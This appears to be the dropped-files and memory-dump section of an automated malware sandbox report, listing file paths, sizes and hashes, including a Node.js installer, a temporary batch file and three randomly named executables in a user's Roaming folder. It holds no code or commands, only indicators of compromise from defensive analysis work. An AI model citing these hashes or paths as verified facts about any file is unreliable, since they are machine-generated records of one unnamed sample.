SHA25604400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be
SHA512278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764
-
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.jsFilesize
16KB
MD5bc0c0eeede037aa152345ab1f9774e92
SHA156e0f71900f0ef8294e46757ec14c0c11ed31d4e
SHA2567a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5
SHA5125f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3
-
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\package.jsonFilesize
1KB
MD5d116a360376e31950428ed26eae9ffd4
SHA1192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b
SHA256c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5
SHA5125221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a
-
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\LICENSEFilesize
763B
MD57428aa9f83c500c4a434f8848ee23851
SHA1166b3e1c1b7d7cb7b070108876492529f546219f
SHA2561fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7
SHA512c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce
-
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\commonjs\package.jsonFilesize
28B
MD556368b3e2b84dac2c9ed38b5c4329ec2
SHA1f67c4acef5973c256c47998b20b5165ab7629ed4
SHA25658b55392b5778941e1e96892a70edc12e2d7bb8541289b237fbddc9926ed51bd
SHA512d662bff3885118e607079fcbeedb27368589bc0ee89f90b9281723fa08bda65e5a08d9640da188773193c0076ec0a5c92624673a6a961490be163e2553d6f482
-
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\esm\package.jsonFilesize
26B
MD52324363c71f28a5b7e946a38dc2d9293
SHA17eda542849fb3a4a7b4ba8a7745887adcade1673
SHA2561bf0e53fc74b05f1aade7451fbac72f1944b067d4229d96bae7a225519a250e4
SHA5127437cf8f337d2562a4046246fbfcc5e9949f475a1435e94efbc4b6a55880050077d72692cbc3413e0ccd8f36adf9956a6cc633a2adc85fbff6c4aa2b8edac677
-
C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\es2015\index.jsFilesize
17KB
MD5cf8f16c1aa805000c832f879529c070c
SHA154cc4d6c9b462ad2de246e28cd80ed030504353d
SHA25677f404d608e2a98f2a038a8aa91b83f0a6e3b4937e5de35a8dae0c23aa9ee573
SHA512a786e51af862470ae46ad085d33281e45795c24897e64b2c4b265302fa9cbfa47b262ec188adbc80d51cfc6ba395b500c0d7f5d343ca4fc2b828eaedba4bd29a
-
C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\index.jsFilesize
15KB
MD59841536310d4e186a474dfa2acf558cd
SHA133fabbcc5e1adbe0528243eafd36e5d876aaecaa
SHA2565b3c0ac6483d83e6c079f9ffd1c7a18e883a9aaeaedb2d65dd9d5f78153476b9
SHA512b67680a81bb4b62f959ba66476723eb681614925f556689e4d7240af8216a49f0d994c31381bf6a9489151d14ed8e0d0d4d28b66f02f31188059c9b24aaa3783
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Install Additional Tools for Node.js.lnkFilesize
982B
MD5ce87ea81353419d50d8f2410c3383828
SHA12dd9ddab798ae41062fe6a81885b9bf116173cdd
SHA25660e7a8aef6a3853a660b04b22b18492ba0c0ecff009279936d06bc030c7c0186
SHA512d5e912f55c8f09d6ce5adb516c3d392d297f715e5c6d1e6f7e95af1c194fc4bad8ae6d6aef184a5032be3194b0b7d77e71160ae5a4e3a9eb26ef41ffad210951
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js command prompt.lnkFilesize
966B
MD58e0db42646acac332e1ed7e333fe1c92
SHA1bc0836bb52f49c2050731f4428b88876f20f90c0
SHA2565dd3633788c9ab900e00327ccce6eaedf6c2efb88575bf384fb0630b79d6fae8
SHA51208b3eb950be177e22127e5a1e90cecc511141d7a1de99ceea46e2476ecb90e350114bee318942339c721c156fc9cb3b4a5a6ad31881892f5f287e4f701cb64c6
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.urlFilesize
168B
MD51c1f6159630c170b596af7c9085f8bb0
SHA1ac26cfe43e10a9f76aee943f9ceff3dc77df29fd
SHA25661403502b3d584ab749a417955dda3d6c956e64109cc4ac4e46e44b462b7c4f0
SHA512f93d2e86c287ed4e50a0c00bcd9594c322cfbd0507bbd191d97c7dd2881850296986139df9580ba1bbaae8abab284335db64c41f6edde441e34fa56b934c3046
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js website.urlFilesize
133B
MD535b86e177ab52108bd9fed7425a9e34a
SHA176a1f47a10e3ab829f676838147875d75022c70c
SHA256afaa6c6335bd3db79e46fb9d4d54d893cee9288e6bb4738294806a9751657319
SHA5123c8047c94b789c8496af3c2502896cef2d348ee31618893b9b71244af667ec291dcb9b840f869eb984624660086db0c848d1846aa601893e6f9955e56da19f62
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js.lnkFilesize
949B
MD5728032881002ef776c661e7b37fc7052
SHA1ebed662012e2781627f557583fa5ccd2f07cfa2b
SHA256e3300abeb76203665714a403c903e7ea3075637394c9e831ad890933afca61ce
SHA5129060369d341a7ffaf60838a6ab8b1dcf47f82eb88cfc37aa946c4374b1f6a9bc373c9cbf11f78c81023566ca3c3b83902553834f566a6d10a9a648085a279164
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Uninstall Node.js.lnkFilesize
940B
MD51d052dd1504ab48522460df001ce0abb
SHA1394d8bd259deb84d9af3aa3a77ce66744b9b1998
SHA2568bbad8d800a8eae4ce18180f1b626392c13d1df400d3051657bf5edb7b1ef66a
SHA512b0a58e92356dcae1ddc5d8fae1d3b308f827e3da5fc8601d41a42b5fb3cda8d0fcdd2a4109c1c4052a343a02559dfba2299b1201f9db8e18c58edb88b610bebb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEBFilesize
400B
MD5ffaa07c943849d9e0021f24f19cc2b57
SHA18d587f59c0869f16698c015c135da83c3075f800
SHA256313ab6a2a7a4225f29a833b375b176afe6434fe3c476fe271d435cecb5c7e2d9
SHA512cb182242546446d8e93773f2b7d5202b92559c33dbde206dbdb43e618750442b129c3ec9f824e98774379a70b0416915e6db6bfc9a6e8d4a6a1666c568eaceed
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_0D7BFF9D231ADDC3439B70E4C5E809D4Filesize
404B
MD5f4113ce9bd31c66a7b2ee8203e94ffc0
SHA1fe9f7635278d8753994ad2dc4949ced8a45eab3a
SHA256c07c5e5bc47bcbddc7175c1fc54724458012b6f648a10a1c2966300085e189af
SHA51261762e4daf2b7e4de48482f88dd723b31e624e75f84ab944326f8ee6c94cf92637056b9e8ac4a92a399d118bb6bf7badb3fa1dd86876731dcfc4315a8715886b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Filesize
412B
MD5edf93434fafb973805fd16995e5f888e
SHA1a9028a9eae8f355c6a6e614a62fbfd6684f18bad
SHA2567eadbe0b79c67c9c3eae723c3cbb2dd30b0596c5731049bf9fae76378d7f9b93
SHA51256eeea319ca763a0df27871ecf00021ef3cb37f35ff23575e788121ffe579abb47e0bfaf81e65b40e46d959a59780db4ac1fd0f714befe02b257e47cb28e7b5f
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
28KB
MD5da108bd8ddf8d7c5cb6af40590482493
SHA17680278b37e38d0f43b6238fde8a6cf7ddd22f76
SHA2567a18f345e6d81dca7137c13cc4e520bfaac87e149900c09991606e5f7ac3ac92
SHA5122124c50db4c568f9250a679d70590881453fac46600303eed56ed49af57f5d6b08cc6630bdf65c9fbb5c4d0e0cec9ca0d1574aca593b4e8dbe43510f602e531a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5a5c074e56305e761d7cbc42993300e1c
SHA139b2e23ba5c56b4f332b3607df056d8df23555bf
SHA256e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953
SHA512c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d4ff23c124ae23955d34ae2a7306099a
SHA1b814e3331a09a27acfcd114d0c8fcb07957940a3
SHA2561de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87
SHA512f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79
-
C:\Users\Admin\AppData\Local\Temp\4A28.tmp\4A29.tmp\4A2A.batFilesize
1KB
MD52b49f09f8e1785bf2e5c79d0f2bc7389
SHA105d68482ab1db17e11fef25fae270c3b784000ae
SHA256706536e5077fcb4e5e4dd2f77d40f492e7ab6b12065cdc0b450fdd483f436279
SHA512ba8cc161086caa5beb691191ff10f1408e68be79a075d0a653716df497cec762b7767783a0dc91bcba2f260df0fa9ff77e9cf982a364135a18c281e50564bc0a
-
C:\Users\Admin\AppData\Local\Temp\4A28.tmp\nodejs-installer.msiFilesize
25.3MB
MD50df081aa47e7159e585488a161a97466
SHA12dc9a592dbb208624aff11a57f97bea89a315973
SHA25620c578361911d7b0cf153b293b025970eca383a2c802e0df438ac254aaca165d
SHA5122e1b58add6a714281f2ddeb936069c0eb8ce24ae2e440941379c4273afd7f1a96b162d5b88211e8678804bad652e48c99a4993e0e0d0da4d1abd7550d397e836
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1ovwypcy.1ou.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\5nkjivka.0do0.exeFilesize
5.2MB
MD5f55fc8c32bee8f7b2253298f0a0012ba
SHA1574c7a8f3eb378c03f58bc96252769296b20970e
SHA256cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9
SHA512c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a
-
C:\Users\Admin\AppData\Roaming\5nkjivka.0do1.exeFilesize
423KB
MD5448e72d5b4a0ab039607cbaf93707732
SHA1bbb85f7a6b8915d6a6739aa4f80be2766c62eb9f
SHA256df97eb504ed5a3298737f83d418d70025f3be0daf56d6ccae35ec0d2ef813b20
SHA512a4f82bb6385e1259e082128604e4232e2f0f3436d8fa8aa04ce3b0d42c943b8b3da4ffb74e307ba7243801b5b48ca07848cc8d029fc8a36cfb90e50ebaaba6a4
-
C:\Users\Admin\AppData\Roaming\5nkjivka.0do2.exeFilesize
89KB
MD5a3b2fcf0c05bb385115894d38c2e6c44
SHA132cf50911381bbec1dad6aec06c2a741bd5d8213
SHA256dbfe02373aa15cc50414561f2bf486b69a11cd9cd50217608c1d18d17e72cae1
SHA512fe58a5d238ac39a269897c176de08d0ad2726bb2ea1636f0d383a1484263e43d0878f0b5f4ebee8a10f3db8e72ab9b36b861e29a6a9b6429fa3e51ec7546dee2
-
C:\Windows\Installer\MSI419E.tmpFilesize
341KB
MD574528af81c94087506cebcf38eeab4bc
SHA120c0ddfa620f9778e9053bd721d8f51c330b5202
SHA2562650b77afbbc1faacc91e20a08a89fc2756b9db702a8689d3cc92aa163919b34
SHA5129ce76594f64ea5969fff3becf3ca239b41fc6295bb3abf8e95f04f4209bb5ccddd09c76f69e1d3986a9fe16b4f0628e4a5c51e2d2edf3c60205758c40da04dae
-
C:\Windows\Installer\MSID467.tmpFilesize
125KB
MD5a6c7f0c329b28edb3e7f10d115d85c6d
SHA1f36faaf4af452ab0bcd30ef66de7291bcee21264
SHA2568f2e81c6f8ccd01dd1727cf93b82fe35b3abb8cf1ef3045dcd6cdf3346a59d03
SHA512d7fb6997c9ff0dae74634422b8953a276604c0aa27b1e8d9ce4c87220fd469c6eecac6d86da857ff75378c535d2a684b4a120927c62f5267f1bd4dbdc05a72cf
-
C:\Windows\Installer\MSID4A7.tmpFilesize
390KB
MD580bebea11fbe87108b08762a1bbff2cd
SHA1a7ec111a792fd9a870841be430d130a545613782
SHA256facf518f88cd67afd959c99c3ba233f78a4fbfe7fd3565489da74a585b55e9d1
SHA512a760debb2084d801b6381a0e1dcef66080df03a768cc577b20b8472be87ad8477d59c331159555de10182d87340aa68fe1f3f5d0212048fd7692d85f4da656f6
-
memory/380-109-0x000001827D600000-0x000001827D62B000-memory.dmpFilesize
172KB
-
memory/380-110-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/616-100-0x0000022DEBE60000-0x0000022DEBE8B000-memory.dmpFilesize
172KB
-
memory/616-99-0x0000022DEBE30000-0x0000022DEBE54000-memory.dmpFilesize
144KB
-
memory/616-101-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/672-104-0x000001EB44630000-0x000001EB4465B000-memory.dmpFilesize
172KB
-
memory/672-105-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/684-113-0x000001E0DBE60000-0x000001E0DBE8B000-memory.dmpFilesize
172KB
-
memory/684-114-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/952-116-0x0000014FB77A0000-0x0000014FB77CB000-memory.dmpFilesize
172KB
-
memory/952-117-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/1032-124-0x000001C23E4B0000-0x000001C23E4DB000-memory.dmpFilesize
172KB
-
memory/1032-125-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/1116-127-0x00000176C99B0000-0x00000176C99DB000-memory.dmpFilesize
172KB
-
memory/1116-128-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/1144-130-0x000001FD42520000-0x000001FD4254B000-memory.dmpFilesize
172KB
-
memory/1144-131-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/1152-134-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/1152-133-0x0000029C546B0000-0x0000029C546DB000-memory.dmpFilesize
172KB
-
memory/1188-137-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/1188-136-0x0000016980090000-0x00000169800BB000-memory.dmpFilesize
172KB
-
memory/1276-142-0x00000211959D0000-0x00000211959FB000-memory.dmpFilesize
172KB
-
memory/1920-92-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/1920-96-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/1920-88-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/1920-89-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/1920-93-0x00007FFAA5CB0000-0x00007FFAA5EA5000-memory.dmpFilesize
2.0MB
-
memory/1920-94-0x00007FFAA4060000-0x00007FFAA411E000-memory.dmpFilesize
760KB
-
memory/1920-90-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/1920-87-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/3752-70-0x0000000000EF0000-0x0000000000EF9000-memory.dmpFilesize
36KB
-
memory/3752-76-0x00000000773F0000-0x0000000077605000-memory.dmpFilesize
2.1MB
-
memory/3752-74-0x00007FFAA5CB0000-0x00007FFAA5EA5000-memory.dmpFilesize
2.0MB
-
memory/3752-73-0x0000000002BB0000-0x0000000002FB0000-memory.dmpFilesize
4.0MB
-
memory/4540-2582-0x00000250E70E0000-0x00000250E7886000-memory.dmpFilesize
7.6MB
-
memory/4756-17-0x00007FFA87260000-0x00007FFA87D21000-memory.dmpFilesize
10.8MB
-
memory/4756-16-0x00007FFA87260000-0x00007FFA87D21000-memory.dmpFilesize
10.8MB
-
memory/4756-8-0x00000199FA750000-0x00000199FA772000-memory.dmpFilesize
136KB
-
memory/4756-13-0x00007FFA87260000-0x00007FFA87D21000-memory.dmpFilesize
10.8MB
-
memory/4756-51-0x00007FFA87260000-0x00007FFA87D21000-memory.dmpFilesize
10.8MB
-
memory/4756-14-0x00007FFA87260000-0x00007FFA87D21000-memory.dmpFilesize
10.8MB
-
memory/4756-15-0x00007FFA87260000-0x00007FFA87D21000-memory.dmpFilesize
10.8MB
-
memory/4832-1-0x0000000000930000-0x0000000000938000-memory.dmpFilesize
32KB
-
memory/4832-0-0x00007FFA87263000-0x00007FFA87265000-memory.dmpFilesize
8KB
-
memory/4844-65-0x00000000037E0000-0x0000000003BE0000-memory.dmpFilesize
4.0MB
-
memory/4844-71-0x0000000000BD0000-0x0000000000C4E000-memory.dmpFilesize
504KB
-
memory/4844-46-0x0000000000BD0000-0x0000000000C4E000-memory.dmpFilesize
504KB
-
memory/4844-69-0x00000000773F0000-0x0000000077605000-memory.dmpFilesize
2.1MB
-
memory/4844-66-0x00000000037E0000-0x0000000003BE0000-memory.dmpFilesize
4.0MB
-
memory/4844-67-0x00007FFAA5CB0000-0x00007FFAA5EA5000-memory.dmpFilesize
2.0MB